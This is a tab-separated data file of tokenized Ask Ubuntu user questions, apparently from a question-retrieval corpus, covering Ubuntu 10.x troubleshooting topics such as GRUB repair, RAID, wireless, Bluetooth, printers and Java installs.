17429	z600 workstation acpi fan noise	i have an hp z600 workstation that has the fan running full when idle . in fact , after the boot , the fan never slows down or varies . i looked in dmesg , and noticed this : [ 1.516778 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.516781 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.516786 ] acpi : marking method _osc as serialized because of ae_already_exists error [ 1.519868 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.519872 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.624638 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.624642 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.624726 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.624729 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.624802 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.624805 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.624895 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.624898 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.624977 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.624981 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.625070 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.625074 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists [ 1.625153 ] acpi error ( dsfield-0143 ) : [ capd ] namespace lookup failure , ae_already_exists [ 1.625157 ] acpi error ( psparse-0537 ) : method parse/execution failed [ \_sb_.pci0._osc ] ( node ffff8801b8c4e3e0 ) , ae_already_exists anyone know what could be done to fix this ?
17432	is it safe to delete the old kernels from menu.lst ?	when the computer starts , grub shows a long list of previous kernels in addition to the usual stuff , e.g . ubuntu 10.10 , kernel 2.6.35-23-generic ubuntu 10.10 , kernel 2.6.35-23-generic ( recovery mode ) ubuntu 10.10 , kernel 2.6.35-22-generic ubuntu 10.10 , kernel 2.6.35-22-generic ( recovery mode ) [ 6 more similar ] ubuntu 10.10 , memtest86+ other operating systems : dell utility partition windows vista ( loader ) is it safe to delete those extra `` ubuntu 10.10 , kernel '' lines from /etc/grub/menu.lst ? currently i have commented-out from the third one up to ( not including ) memtest86 . but i wonder if they are ever needed for a particular reason ?
17450	remote install of ubuntu server	i have a machine located 500 miles away that 's running ubuntu 8.04 . i figure it 's just about time that i upgrade to the latest lts . however , there 's a software raid ( md_raid ) in there , and i 'm afraid that just a dist-upgrade when i switch over the sources.list will end with catastrophic failure . like a panic on boot that the raid 'd disk ca n't be read , or something else . first , hoping that 's not the case , however , if it ends up happening i 'm wondering if there 's a means of having someone drop in a ubuntu 10.04 server install disk , and flip on ssh , and some means for me to hop on and re-run the installer remotely . is this feasible ? if so , what would one need to do aside run apt-get install ssh on the target machine ? i do have friends who can be in front of the target machine to initiate the process , just not execute it out .
17467	what is taking up so much space on my disk , beside the filesystem ?	i have only one disk in my computer , a 80 gb ssd . it is formatted as a single ext4 partition ( no swap ) , and all the usual folders are installed on it ( i keep lots of data on external media , but /home and all the rest is on the ssd ) . today i booted it and i got a message that the drive is full . i opened disk usage analyzer to look at what takes up space . it insists that 67.8 gb of the disk are used , and that / is taking up 36.4 gb . which leads to the question , where are the missing 30 gb , if not on the file system ? ! just to have a comparison , i added up all the sizes of all readable folders listed in nautilus as subfolders of / ( including the hidden ones ) . i got 20.9 gb . trash was unreadable , but i know it has 16.2 gb , so the sum is 36.1 gb , around the same as what disk usage analyzer is reporting . there were some system folders which were unreadable , like proc , but i doubt that they add up to 30 gb - else it would n't be possible to install ubuntu on small disks , and i 've seen it run on 2.5 gb . i think they must be the 0.3 gb difference between my calculation and the disk usage analyzer 's report . so i 'd like to know , what is eating up these 30 gb and how do i get it to free them ? edit with answers to cyrex 's questions booted from ubuntu 10.10 64 bit live cd ( same as my system ) . fsck result : root @ ubuntu : ~ # fsck /dev/sda1 fsck from util-linux-ng 2.17.2 e2fsck 1.41.12 ( 17-may-2010 ) /dev/sda1 : clean , 265956/4890624 files , 18073343/19537408 blocks booted from the sdd . emptied the trash , and the 16 gb from there are now free . the 30 gb are still missing . i am not experienced enough to know what counts as weird in a log . here are my messages log and my syslog since last boot , maybe you can find something in them : http : //pastebin.com/fhrrv1rr http : //pastebin.com/fk8tmzbc here it got really strange . i plugged in an external 500 gb hdd . disk usage analyzer overreported the available space , then showed space missing ( 76 gb used , but only 24 in folders ) . booted again from the livecd , started the disk usage analyzer from it and got the same results as from the installed ubuntu , within 1-2 gb . edit with answer to codemonk that would have been a nice solution , but the partition is really 80 gb - i mean 74 gb + marketing `` error '' , anyway the whole disk is formatted . it also shows that over 50 gb are used - so where are the 30 gb if not in files and folders ? gparted also reports the correct size of the external hdd .
17468	network load-balancing with network manager	can i use network manager to connect to multiple networks so they can share the load ?
17479	how can i make the network manager automatically connect to a new network ?	if my computer is on without an network connection ( e.g . the router is rebooted , the network cable is unplugged , etc ) , it wo n't connect at all until i fix the connection then reboot the computer . how can i make the network manager automatically connect to a new network ? edit : here is the log file edited to only show network manager . it only show a couple hours as the file is somewhat repetitive .
17482	how do i set up last.fm scrobbling with pianobar ?	i just read about this command line pandora player called pianobar it works great but the homepage says `` last.fm scrobbling ( using an external scrobbler ) '' any one ever set this up before ?
17483	arpwatch - no email	im fairly new to ubuntu and i decided to try and get arpwatch up and running so i can monitor my network network . after following the directions at http : //aimlinux.com/blog/ ? p=56 i am not getting any email notifications . sorry thats all i have to go off of right now . the service seems to be running and i think it is seeing devices on the network , but i get no notification
17484	way to detect which workspace you are currently in from the command line	i 'm trying to figure out how to get the workspace number from a terminal script in gnome . any ideas ?
17486	remove unity , back to gnome and desktop crash	i installed unity packages from the software center , and after that some promblems started at the normal desktop session . i unistalled the unity packages and now in desktop session , compiz crashes , indicators crash ... i need help to reinstall the desktop session normally . how i reinstall the ubuntu 10.10 desktop clean whitout format ?
17488	how do i get evolution to delete e-mail on gmail account ?	how do i make evolution delete mail in my gmail account using pop3 ?
17493	dual boot . broken windows 7 mbr and grub	at the beginning i have been windows 7 on /dev/sda1 . after that i have installed ubuntu in /dev/sda7 and set grub partition to /dev/sda1 . which broked down windows 7 boot . ubuntu have booted normally from grub menu , but when i choosed windows 7 , grub disappared and after 1 second appeared , and does n't load . after that i have searched for some fixes for windows 7 boot , and i do some `` fixings '' . the result - grub does n't load . at this moment i have broken windows 7 loader and broken grub . and sitting with ubuntu live cd . how can i fix this with ubuntu live cd ? if possible please give step by step explanation , because i newbie in ubuntu and linux . edit : grub loader fixed . but anyway ... windows 7 does n't load from grub . i 'm using grub2 . edit2 as i understand i need to run bootrec.exe /fixboot to fix windows 7 bootloader . but i do n't have win7 dvd at this moment . any way to do same from ubuntu ? edit3 boot info script results.txt is here : http : //pastebin.com/z70fkqhj
17496	what strategies ( especially available software ) do you use to keep passwords safe ?	inspired by the recent issue with the gawker network sites , i 've been re-evaluating my password management . what strategies do you use to keep passwords safe ? i 'm particularly interested in software-based solutions available for ubuntu , but any interesting ideas should be shared . bonus points for solutions which are available on android as well .
17504	how can i have a bluetooth keyboard auto-connect at startup ?	i have a bluetooth keyboard for my htpc . i pair it with my computer via bluetooth , and it works fine . however , when i turn off the keyboard or my computer , it has to connect again ( which requires me entering a passcode on the computer and keyboard ) when i turn them back on . i 've looked through many forums and through that i have found that i 'm missing some seemingly vital bluetooth files : /etc/default/bluetooth /etc/init.d/bluetooth /etc/bluetooth/hcid.conf in the instructions that i 've found online so far , i must change certain lines in any of these files . i am unable to , since they do not exist . am i missing a dependency or something ? i 've also tried installing blueman but that did n't help at all . i 'm running ubuntu 10.10 ( maverick ) . original post : http : //ubuntuforums.org/showthread.php ? t=1643386 & highlight=bluetooth
17508	how to have debian packaging generate two packages given an upstream source archive ?	i am packaging something for my ppa . the upstream source is a .tar.gz archive which is makefile-based . since this package has a significant amount of architecture-independent data , it would be wise to have the build scripts generate two packages : package package-data how can i set this up ? i 've edited my debian control file to generate two packages , but i have no idea how to get the right files to the right package . since the data files are currently all installed via the makefile , i am kind of lost here .
17513	customization in panel	when i minimize folders and mozilla , it is not visible in the panel . i do not where it is stored .
17518	after update , grub is broken	some months back i used wubi to install ubuntu on an hp laptop with vista . after not using it for a month or so , i loaded ubuntu and installed many updates ( including kernel update ) . windows boot manager loads without any problems , and i can boot to vista without problems . however , if i choose ubuntu , the screen briefly flashes try ( hd0,0 ) : ntfs5 and then goes to black . i never get to the kernel image selection screen .
17527	unable to right click	it appears i can not right click on the menus to change their appearance etc , nothing happens . i am completely new to linux so might be doing something wrong . installed utweakgi , but it tells me system or administrator can not use the software and might not load . can someone help me with this one , do n't know where else to look .
17530	installing multiple versions of sun java	i have a need to maintain different versions of a certain product written in java , and uses sun 's jdk to build . some older versions of the product need an older jdk ( 1.5 ) and the newer ones need jdk 1.6 . so , my question is how can i install ( and maintain ) multiple versions of sun 's jdk . i do n't want openjdk , icedtea or whatever else , but different versions of sun 's jdk itself . i ask this as i 've seen i have the commands python , python2.6 accessible . if i install another python version , i get it as python2.7 although the python command does n't point to it . this is exactly the kind of setup i need with java . but anything close also works . thank you .
17532	installing a program downloaded as a .tgz	how to install a program with the.tgz extention ?
17536	how do i create a permanent bash alias ?	i would like to create an alias to rm command in order to have a confirmation message after executing this command . so i am creating an alias like this alias rm='rm -i ' . but as far as i know this is a temporary alias and it lives until you close the terminal . as it is explained here to save alias permanently i need to execute ~/.bash_aliases or ~/.bashrc commands in terminal and add my alias there . but when i execute ~/.bashrc i get following error message : bash : /home/bakhtiyor/.bashrc : permission denied when i run ~/.bash_aliases i get another error message like this : bash : /home/bakhtiyor/.bash_aliases : file or directory does n't exist . what is the actual problem and how can i solve it ?
17539	what 's a simple/standard way to set up a secondary ubuntu server on the same machine ?	i manage several ubuntu servers remotely , and occasionally , there will be a need to run fsck on the root partition . from what i 've read , the best way to achieve this without physical access to the machine is to have another os installed , and tweak grub to boot into that os after reboot . i have done that on some of the servers , and it did prove useful once or twice . however , installing the two oses was a pain , since i could n't use simple `` guided - use entire disk '' options , and had to manually craft the partition sizes and define the boot/swap/root etc , which made the installation less pleasant . so my question is : is there a simple way that i 'm missing to just install a second ubuntu server on the same machine , where i can just tell it `` use 5 gb of the hard drive , and do n't bother me with questions '' ? alternatively , is there a better way to enable fsck-ing of the root partition without physical access ? update : after looking around some more , it seems that it might make more sense to install systemrescuecd on the hard drive , rather than a full-fledged ubuntu . as long as i 'm behind a firewall this might be acceptable . still not an easy solution .
17540	how do i set executable permissions on a removable drive ?	i 'm using ubuntu 10.10 and using a usb drive but i 'm finding that i ca n't chmod any programs on the drive to +x . it is being auto-mounted by gnome ( using udev , i think ? ) so i imagine the problem is a mount option but i ca n't seem to find a way to modify the default mount options any where . there are no entries in fstab . anybody encounter this problem ?
17545	where does ubuntu store its library files ?	i want to add my own library to use in c compiling , but do n't really know where ubuntu stores it .
17548	how can i block ping requests with iptables ?	and stealth specific ports ?
17555	how to fix boot message [ raid partition ] not ready yet ?	i 've got a raid 5 setup for my /home partition . every two to three boots my hdisks do n't seem to be ready in time and my pc hangs saying that /home is n't ready yet . i then have to manually activate it by pressing m and typing dmraid -ay . this always activates the /home partition . how can i tell ubuntu to wait longer if my home-dir could n't be mounted yet ?
17557	wireless iwconfig rate auto too low	left to its own devices my wireless connects at too low a speed . i have a 20meg internet connection and my wireless is slowing it down to like 3meg . when i reboot into windows it 's fine . when i run iwconfig eth1 rate 24m or even 48m the connection is much faster and runs fine , why wo n't it automatically go higher ? is this the fault of the driver ? i am running broadcom 's driver compiled from source . would adding iwconfig eth1 rate 24m to rc.local be the right way to force it at boot ? output from iwconfig when rate=auto : eth1 ieee 802.11 essid : '' honeypot '' mode : managed frequency:2.417 ghz access point : xxx bit rate=1 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=5/5 signal level=-47 dbm noise level=-91 dbm rx invalid nwid:0 rx invalid crypt:2 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 thanks , jamie
17558	how to view and/or edit a .mdb jet ms access database file ?	i have a .mdb database file which originated from a ms access jet database . is the some way to view this database , and even better , a way to edit and export it ?
17560	error ( in gtk ? ) when trying to install eclipsexul plugin	when installing eclipsexul plugin on eclipsephp , it says : can not complete the install because one or more required items could not be found . software currently installed : shared profile 1.0.0.1288098146566 ( sharedprofile_epp.package.php 1.0.0.1288098146566 ) missing requirement : shared profile 1.0.0.1288098146566 ( sharedprofile_epp.package.php 1.0.0.1288098146566 ) requires 'sharedprofile_epp.package.php [ 1.0.0.1288098145696 ] ' but it could not be found any idea what 's wrong ? when running from the terminal , i can see a message , when i open the updates windows : ** ( eclipse:3364 ) : critical ** : murrine_style_draw_box : assertion `height > = -1 ' failed recently i have my whole home folder deleted by a script . maybe there 's something with this.. but i just downloaded a brand new eclipse installation and put it in my /home/eclipse/ folder .
17561	how to hide file extensions	is there a way to hide all file extensions like in windows ?
17569	libreoffice rc1 deb package difficulties	i seem to be running into some difficulties with the acquisition of the latest libreoffice deb pkg . when i type sudo apt-get update i get e : malformed line 60 in source list /etc/apt/sources.list ( dist ) e : the list of sources could not be read . i do n't understand of that means that i did something wrong or if there is a problem at tuxfamily . any help is , as always , greatly appreciated . full contents of /etc/apt/sources.list .
17571	choose another partition for /home directory during installation of ubuntu ?	since this question as addition in another question i created got lost , here is it as a separate question . is there a possibility to choose another partition for /home directory during installation of ubuntu
17572	how to understand the different stages of bootloading ?	i would like to know different stages of the bootloading process happening in ubuntu . specifically the different stages in grub and grub2 . please guide me on this topic . thanks , sen
17576	how to do lan search similar to netscan in windows ?	i use netscan softwar to search the available computers with the shared items in microsoft windows . i could give it an ip address range and it retured the available ip address . in ubuntu is there such a way to scan the network ?
17578	how do i enable desktop visual effects ?	i have lenovo g460 with vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) grapics card i have install the driver using gksudo jockey-gtk command , but when i change the visual effects to extra its give me 'desktop effects could not be enabled ' . i am new to ubuntu .
17579	how to fix sound in wolfenstein enemy territory	i installed wolf : et , and i cant get sound to work . everything that i have installed is in default paths , i had 10.4 and then upgraded to 10.10 via software update gui . i had sound working in 10.04 with method under 2 . i have tried following killall esd ; et ; esd with that i get -- -- -- - sound initialization -- -- -- - /dev/adsp : no such file or directory could not open /dev/adsp -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- sudo -i echo `` et.x86 0 0 direct '' > /proc/asound/card0/pcm0p/oss echo `` et.x86 0 0 disable '' > /proc/asound/card0/pcm0c/oss exit with that i get bash : /proc/asound/card0/pcm0p/oss : no such file or directory and indeed i do not have that , i have only sub0 and sub1 in pcm0p i have tried running et with et-sdl-sound script , but with that i get this output in console http : //pastebin.com/j7gru1uh i have probably messed up sdl libraries , could not get sound to work , so downloaded new from debian package site and installed them . tried setting sdl_audiodriver= '' pulse '' in et-sdl-sound , looks like i am getting same error as in method 3. pasuspender -- et +set s_alsa_pcm plughw:0 gives me -- -- -- - sound initialization -- -- -- - /dev/adsp : no such file or directory could not open /dev/adsp _ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- misc : @ oli : i do not know if i am running pulse or esd , how can i check that ?
17582	how to change path of partition in grub2	i used to have a windows 7 partition on my primary hard drive . but i recently moved the partition to the secondary partition , thus a change from sda1 to sdb1 . i know that i 'm not supposed to edit /boot/grub/grub.cfg , which is still configured to sda1 . which file should i edit ?
17584	changing column numbering system in calc ( spreadsheet ) , not the formatting	i am trying to convert a numbering system in an old dbase file . i have manage to open it in calc and , before i use it as a table in a new database created with base , there is a field ( column ) i would like to modify . the actual format is ex : 100-1234-56 i would like to : add a 1 in front of it , keep the first 3 numbers , remove the dash , keep the next four numbers and remove the dash with the last 2 numbers like this : 100-1234-56 would be 11001234 what are my options ?
17586	can i force empathy to open links in default browser ?	recently empathy has switched it 's behavior for open links . at some point it was that links pasted in the im window where open with whatever program was associated to the mime type of the link 's content type , so , for example if the link was pointing to a image it was open in eog , if the link was a webpage it was open in gedit ( my default setting ) . now it opens everything in chrome even though it 's not my default browser , i 've checked everywhere and chrome is not set as default . i 'm thinking that it 's a bug but wanted to ask before going to launchpad . it 's happening the same to you ? is there a way to force empathy to open everything in firefox as a workaround ?
17590	synaptics touchpad on my acer 4530 stop working	i got my touchpad stop working after several hours being disabled ( using fn+f7 in my acer 4530 ) . i 've tried many times to turn it on using the same key-combination ( fn+f7 ) , although the touchpad indicator says it works , but the touchpad still not working i wonder if anybody know how to fix this problem ?
17593	why ca n't get past the user info screen when installing ?	i have a dell inspiron 1318 ( 07-08 ? ) with an intel cored 2 duo processor and 3 gb of ram . i can run ubuntu 10.10 from the disk , but i 've tried to install it three times with no success . as the files are installing , the program asks me to enter my user information . i 'm fine through the time zone screen , and fine through the keyboard screen . but when it asks me to set my used name and password , the `` next '' button stays ghosted out no matter what i enter . eventually , the installation gets to the point where it says it 's waiting for me , but no matter what i do i ca n't get the `` next '' button to click . i 'm a complete newbie , and i 've been stuck at the same spot three times . if anyone has any idea what 's going wrong , i 'd love to hear about it .
17594	docky is n't running !	docky does n't start , neither in the system startup ( i have it as a startup application ) nor when i start it manually . it stopped working yesterday . i 'm running ubuntu 10.10 , and downloaded docky from the standard repos . docky -- help | head -3 gives me this output : * ( /usr/lib/docky/docky.exe:4184 ) : warning * : the following assembly referenced from /usr/lib/docky/docky.exe could not be loaded : assembly : dbus-sharp-glib ( assemblyref_index=13 ) version : 1.0.0.0 public key : 5675b0c3093115b5 the assembly was not found in the global assembly cache , a path listed in the mono_path environment variable , or in the location of the executing assembly ( /usr/lib/docky/ ) . * ( /usr/lib/docky/docky.exe:4184 ) : warning * : could not load file or assembly 'dbus-sharp-glib , version=1.0.0.0 , culture=neutral , publickeytoken=5675b0c3093115b5 ' or one of its dependencies . * ( /usr/lib/docky/docky.exe:4184 ) : warning * : missing method init in assembly /usr/lib/docky/docky.exe , type dbus.busg unhandled exception : system.io.filenotfoundexception : could not load file or assembly 'dbus-sharp-glib , version=1.0.0.0 , culture=neutral , publickeytoken=5675b0c3093115b5 ' or one of its dependencies . file name : 'dbus-sharp-glib , version=1.0.0.0 , culture=neutral , publickeytoken=56
17595	how to play wmv3 videos	is there any way to play wmv3 videos on ubuntu ? tried using vlc player but it says it can not play the video and there is no way to fix this .
17601	touchpad on dell laptop unresponsive	after running ubuntu 10.10 on a dell latitude d830 flawlessly for a couple weeks , i booted it up to find the mouse completely unresponsive , a few restarts later it started working again , any ideas ? tia @ dell-ora : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ dualpoint stick id=10 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps dualpoint touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ video bus id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=12 [ slave keyboard ( 3 ) ]
17603	how to get xorg to ignore certain input devices ?	what needs to be done so that when a specific input device is plugged in via usb it is not automatically used for input by x ? i still want the /dev/input/* device nodes automatically created , but do n't want x to use them . my xorg.conf currently only has sections for `` screen '' , `` monitor '' , `` display '' , `` serverlayout '' , and `` device '' for my video card . there are no sections for input .
17606	how to fix gpg error/badsig while running apt-get update ?	of late , i 've been getting this long list of errors every time i run apt-get update from the terminal . these errors were n't there before , i have no clue how they cropped up all of a sudden . i even tried some methods as suggested in some forums , but they apparently have n't worked for me so far . i 've even tried changing the server , but to no avail . i 'd be really glad to receive help on this issue . the errors are here : http : //paste.ubuntu.com/544093/
17609	alt + f2 not behaving correctly	recently my alt + f2 keyboard shortcut switches my linux machine to a virtual terminal rather than displaying the run window . i have n't made any specific keyboard changes that could of caused this strange issue . rather than having to press ctrl + alt , suddenly all of the virtual terminal commands have suddenly binded to the just the alt key . what can i do to get them back to their default values ? i 'm using gnome with compiz enabled thanks .
17610	how do i reset my unity configuration ?	i 've been messing around with unity and broke something , how do i `` start over '' ?
17611	what do these apt commands do ?	what do these commands do ? acquire : :http : :no-cache=true -o acquire : :brokenproxy=true update acquire : :http : :max-age `` 0 ''
17615	can some one suggest a software to monitor and maintain record of total internet bandwidth usage	can some one suggest a software for a small home network to monitor the amount uploaded / download from the internet but not the local traffic on the lan . i know there are similar questions like these how can you monitor internet download usage ? monitoring inbound and outbound internet traffic but the suggested softwares in these questions like vnstat dont consider if the traffic is for local network or internet which means that i can not know if i am reaching my isps monthly cap on bandwidth . i have googled for this and found only one software i.e ipac-ng but it is not straight forward . i need something that i a normal user can use easily i.e without changing iptables rules or adding routes .
17617	audio stutters at gdm	ok i have a problem every 2 times out of 3 i login ( i cant be specific it fairly random ) i get a stuttering gdm warning ( not the login sound just the bell sound to wake you up ) the only way to stop it is to login i have a fujitsu siemens amilo 1718 with a 2gig of memory ( only hardware mod ) using 10.10 maverick and i have disabled kms as my system was freezing as per the release notes . the only time this has happened before on the same machine was when i gave kubuntu a try when 10.04 came out then it happened at the login screen and at random times while listening to music in any program . by the way audio is fine as is almost everything else once i have logged in . i would like an answer to this as i am an advocate of ubuntu and its kind of embarrassing when the first thing that happens is *bing* . as requested daniel alsa-info pulse verbose log not sure how useful the pulse log will be as i cant replicate the bug with a terminal open but i wouldnt be asking the question if i knew the answer so ... .. edit 24/12/2010 ... ... been living on cocktail sausages and pickled onions for five days now made a make shift splint with cocktail sticks ... .. oops so updated the alsa drivers but i still get the same message in the dmesg no response from codec , disabling msi : last cmd=0x10a90000 googleing it brings up a forum post from some other distro with a green logo the only common denominator seems to be graphics ie ati radeon xpress 200m which is why i have had to turn of kms as the chip is so old that small mice try to eat the `` kernel '' ; ) funnily enough following the bug link at the end of the post , i found a comment about `` ubuntu black magic '' so mabey i am coming at this from the wrong angle ... ... bad joo joo any one . i will try the second part of daniels fix and update with the result . the final edit : ( plays air guitar ) in the end neither of these solved the problem as such however i have given roland a tick for reminding me of the solution and i gave daniel the bounty for the effort in trying to solve the problem . the answer for future readers was the enable the correct hd audio model i found the answer back when using karmic koala 9.10 in this forum post amilo li1718 skype - ca n't get it working ... the model is options snd-hda-intel model=3stack position_fix=1 enable=yes which can be added to the end of alsa-base.conf thanks all for helping and hope anyone with a similar problem will find the answer here .
17618	mobile music playback on android phone keeps buffering	i have copied some music to a ubuntu synced folder on my karmic machine and i have the ubuntu one android app installed on android 2.2 phone . when listening to music i get frequent breaks whilst the music is buffering , even with full signal . every other music streaming service such as `` last fm '' and `` bbc iplayer '' are fine . what is going wrong ? mp3s should not have trouble buffering over a good 3g signal . i have set cache size to 200mb but i cant find a buffer size . is it my mp3s ? they are usually in the order of 320kb/s this is a breaker for me if there is no solution which is a massive shame as i like the principal of the software . cheers
17620	kyocera fs-2020d printer does not work	i have a kyocera fs-2020d . i followed the manufacturer instructions to install the printer , but it does not work . manufacturer 's ppd for the printer : http : //usa.kyoceramita.com/americas/jsp/upload/resource/19915/0/kyocera_fs-2020d.ppd cups always says processing and than nothing happens . i use pcl 6 emulation in the printer but tried the kpdl also . i contacted the kyocera support , and they provided me a mac osx driver and they told me that will work because linux and mac are unix based systems ... i tried to print from command line . i run this command : echo -en `` hello world ! '' > /dev/usb/lp0 but i never got back the prompt . maybe this is some sort of communication problem related to the kernel ? ( there is no problem printig from windows ) thank you in advance all help .
17621	restore synchronized files/folders from ubuntu one	is there a way to download every file i have uploaded to ubuntu one in one single download ? i have recently had a major hard drive crash and i would like to restore all my synchronized files on ubuntu one on my new hard drive . the only way i found to do so is to download each files individually . since i have many files ( 100s ) , i was wondering if there was a way to download every files/folders in my ubuntu one directory ( on the server ) in one single download .
17626	how can i restore default keyboard shortcuts ?	i have customized some of the shortcuts in system ▸ preferences ▸ keyboard shortcuts . how can i restore individual shortcuts to their default settings ? i do not want to reset all of the shortcuts , just a few of my choice .
17627	upgrading to python 3.2	i want to use new functools that provides with the lrucache , i am currently using python 2.6 , which does n't support this , what is the best way i can upgrade to python 3.2 ? or is there any other way that i can use the itertools+functools of 3.2 release in python 2.6 distribution thank you
17628	how to replace adobe air notifications icons	i have been using various tool that depend on the adobe air platform on ubuntu , like tweetdeck and grooveshark . i have always hated , how the notification icons look , but i need them there for ease of use . has anyone managed to change how the icons bleed into the taskbar , or even tell me where i could replace the notification icons with ones that look better . as you can see below the notication icons for skype and xchat look fine . please and thank you !
17630	what is the kubuntu equivalent for 'network tools ' as in ubuntu ?	there is a tool in ubuntu system - > administration - > network tools . what is the kde equivalent for this ?
17633	how to recreate cache for `` aptoncd '' after cleaning cache through apt-get clean ?	i recently had to opt for cleaning my cache through apt-get clean after getting lots of gpg errors during update . but it 's created another problem for me since i want to create an `` aptoncd '' for backup . i want to know how i could just get all the packages i 've installed on my computer so that i could include them in my aptoncd . is it possible to achieve that by selecting all installed packages in synaptic for reinstallation but choosing to download those files only . i hope that option will leave my installed packages intact .
17636	why is n't my applet initializing in face book games ?	whenever i want to play games on face book i have to use windows . i can not get the applet to initialize on ubuntu . i have my drive partitioned to use both . any ideas will be most helpful . thanks .
17640	how can i securely erase a hard drive ?	i 'm planning on selling a usb external hard drive that currently contains an old ubuntu installation with stored passwords and banking information . how can i securely erase the drive before selling it ?
17641	create encrypted ( password protected ) zip file	how do i create an encrypted ( password protected ) zip file ?
17646	ca n't switch on wireless networking	i am having a problem setting up a wireless connection on my linux laptop , does anyone know the shortcut to turn the wireless on , the fn + f3 on my acer laptop would obviously only apply to the original windows operating system .
17647	target filesystem does n't have requested /sbin/init	i installed 10.10 a few days ago . the only changes to the default install are the addition of chrome and pinta . it was fine for a few days , then today login etc seemed slow . likewise it could n't even render the restart/shutdown menus . hoping it was some botched update , i ran the update manager ; it tried to install but failed ( the ui did n't make it obvious what had failed ) . fine , ok . shut it down ( press enter on the blank shut-down dialog ) . fire it up hoping ... and ... # fail . target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . is it now a brick ? more details : grub 1.98+20100804-5ubuntu3 with ubuntu , with linux 2.6.35-22-generic causes udevadm trigger is not permitted while udev is unxonfigured giving up waiting for root device . or ubuntu , with linux 2.6.35-23-generic causes mount : mounting /dev on /root/dev failed : no such file or directory then the same for /sys and /process
17653	is there an xpadder equivalent ?	xpadder allows to control the mouse cursor by using a joystick , gamepad , etc . xpadder only works on windows , however i 'm not sure if it would work on ubuntu too , i 'm using a xbox360 wireless controller with xpadder on windows . could xpadder work on ubuntu too ?
17654	can i sync a rhythmbox playlist with an mp3 player ?	i ca n't sync a rhythmbox playlist onto my mp3 player , how can i do this ?
17655	change swap ( potentially with user data ) to ext4	i have a 1 tb external harddisk where i recently installed ubuntu onto . before i had some backups there which i did n't want to lose . therefore i created a new partition for ubuntu . during this process i somehow must have changed the type of the backup partition from ext4 to swap ( although i ca n't remember in doing so , but this is what gparted shows me ) . this new swap partition has never been used by the newly installed ubuntu which has its own swap partition . although i think chances are bad : is there any way to get my data back from my backup ( now swap ) partition ? to clarify the situation , here 's the current partition table of the device : partition start end size in sectors 1 * linux swap 0 32 33 12157 195 58 195312500 2 e extended 12157 214 24 47791 227 52 572461058 5 l linux swap 12157 214 26 12534 172 54 6053888 x extended 12534 172 55 17397 188 7 78125056 6 l linux 12534 205 24 17397 188 7 78123008 x extended 17397 188 8 47791 227 52 488282112 7 l linux 17397 220 40 47791 227 52 488280064
17663	wacom intuos 3 with inkscape 0.47	how do you set up inkscape 0.47 to work with wacom intuos 3 ? in particular , i 'd like to get pressure-sensitivity to work on inkscape . i have `` use pressure-sensitive tablet '' checked under the inkscape preferences , but it does n't seem to be working . any thoughts ?
17664	how are bugs in item descriptions in the software centre fixed ?	where would i find the source files that pertain to the package listing in the software centre ? i 'm guessing the sc is just a window through which these listings are viewed , rather than being a part of the sc itself , so are these customised files found only in the ubuntu variant of the package , or is it part of the upstream project ?
17665	open office mail merge does n't work	as far as i can tell , mail merge ( as well as data sources ) is broken in openoffice on 10.04 . there is no view | data sources menu option , and the shortcut for data sources f4 does nothing . in addition the mail merge wizard does n't allow any 'address book ' to actually be added ( the ok button is never enabled ) . also , add database file ... on the database tab of insert | fields | other ( ctrl+f2 ) is not working .
17672	problems partitioning new laptop for ubuntu	i was recently trying to partition a new laptop with windows 7 , but once i created a new partition that space i had created for ubuntu is labeled unusable . what should i do ? i need ubuntu on my laptop .
17679	how can i put the display to sleep on screen lock ?	when i invoke the `` lock screen '' action , is there a way to have the monitor go to sleep instantly ? i 'm aware of the power management setting to turn off the display after a set amount of time , but i want this to happen immediately . i 'm hoping there is a bash script that will lock the screen and put the display to sleep , and that i can have this invoked when a screen lock operation occurs .
